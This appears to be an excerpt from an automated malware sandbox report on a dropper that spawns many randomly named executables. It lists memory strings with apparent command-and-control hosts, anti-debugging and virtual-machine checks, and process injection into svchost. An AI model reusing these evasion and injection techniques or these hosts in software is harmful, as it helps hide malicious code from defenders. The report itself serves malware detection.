      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: is unavailable%d smbtest done()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCDN updated: %sCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWData[exploited]DefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: unixpacketunknown pcupdate-cdnuser-agentuser32.dllvmsrvc.exewildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: unknown network verify-signatureworkbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)%d-%02d-%02d %02d/bots/update-data0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectData[compaign_id]DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIBM Code Page 037IBM Code Page 437IBM Code Page 850IBM Code Page 852IBM Code Page 855IBM Code Page 860IBM Code Page 862IBM Code Page 863IBM Code Page 865IBM Code Page 866If-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't hide WUPcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfilename is emptyfractional secondget-logfile-proxygp.waiting != nilgroom_allocationshandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunexpected app IDunknown caller pcwait for GC cyclewine_get_version
      Source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpBinary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUGraphics AdapterRDP Reflector DisplayDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):L
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965425168.00000000006F3000.00000004.00000020.sdmp, svchost.exe, 00000025.00000000.942975420.000001DA2963F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeSystem information queried: ModuleInformation
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess information queried: ProcessInformation

      Anti Debugging:

      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeSystem information queried: CodeIntegrityInformation
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeSystem information queried: KernelDebuggerInformation
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeProcess queried: DebugPort
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeProcess queried: DebugPort
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01287E52 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01284938 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01293947 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012939BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129398B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00401000 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00B19665 push dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01250360 __aulldiv,__aulldiv,__aulldiv,__aulldiv,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetReadFile,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetCloseHandle,InternetCloseHandle,
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01253465 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01287E52 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0046E567 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00467018 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_0040BE40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00414E70 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00408430 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Allocates memory in foreign processes
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA295A0000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeMemory written: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe base: 400000 value starts with: 4D5A
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\System32\svchost.exeThread register set: target process: 1380
      Sets debug register (to hijack the execution of another thread)
      Source: C:\Windows\System32\svchost.exeThread register set: 1380 4C000
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA295A0000
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess created: unknown unknown
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: explorer.exe, 00000027.00000000.747615085.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: EnumSystemLocalesW,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Code function: GetLocaleInfoA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
